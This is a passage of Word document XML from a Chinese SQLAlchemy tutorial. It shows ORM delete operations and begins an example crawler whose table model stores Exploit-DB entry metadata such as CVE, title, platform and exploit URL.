    <w:p w14:paraId="47138E05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>删</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C2E4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>和更新数据类似，删除数据也有两种方法，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C95408" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA98DBF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第一种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAFC63B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>delete_users = session.query(Users).filter(Users.name == "test").first()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E54AA5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if delete_users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01187F0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.delete(delete_users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE6087" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F59CFDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73885F29" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>第二种：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B79271" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.query(Users).filter(Users.name == "test").delete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A79DE48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>session.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005132D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>批量删除时推荐使用第二种。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46185545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450FCEB7" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A734B2A" w14:textId="0DA86EDD" w:rsidR="00A36DC7" w:rsidRDefault="002B2147" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="599" w:name="_Toc159780032"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实际案例：</w:t>
      </w:r>
      <w:r w:rsidR="00E6398A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>expDB</w:t>
      </w:r>
      <w:r w:rsidR="00E6398A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爬虫</w:t>
      </w:r>
      <w:bookmarkEnd w:id="599"/>
    </w:p>
    <w:p w14:paraId="6E9F3A9C" w14:textId="738E3083" w:rsidR="00E6398A" w:rsidRPr="00E6398A" w:rsidRDefault="000F78FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="000F78FC">
        <w:t>https://www.cnblogs.com/go2sleep/p/12446141.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5BB91" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C63A800" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就将数据库映射成对象，然后使用对象的方式操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，这里使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLalchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0630E178" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要实现两个类，一个类用于和数据库通信，完成增删改查等操作，另一个类是映射类，将数据库中的表与之形成映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45753B0E" w14:textId="77777777" w:rsidR="007966D4" w:rsidRDefault="007966D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F0A996" w14:textId="53F54C0C" w:rsidR="007966D4" w:rsidRDefault="007966D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始引入的库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077C4E64" w14:textId="77777777" w:rsidR="007966D4" w:rsidRDefault="007966D4" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlalchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlalchemy.orm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sessionmaker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlalchemy.ext.declarative </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>declarative_base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlalchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column, Integer, String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Base = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>declarative_base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726E37C5" w14:textId="77777777" w:rsidR="007966D4" w:rsidRDefault="007966D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C46676D" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库中的表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF41512" w14:textId="77777777" w:rsidR="00204F06" w:rsidRDefault="00204F06" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DBPoc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(Base):</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    create table exp_poc_info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    id int(11) primary key,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    eid int(11),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    cve varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    title varchar(512),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    author varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    published_time varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    verified varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    platform varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_type varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_url varchar(128),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    exploit_app varchar(128)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">__tablename__ = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'exp_poc_info'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">id = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Integer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>primary_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>True</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eid = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
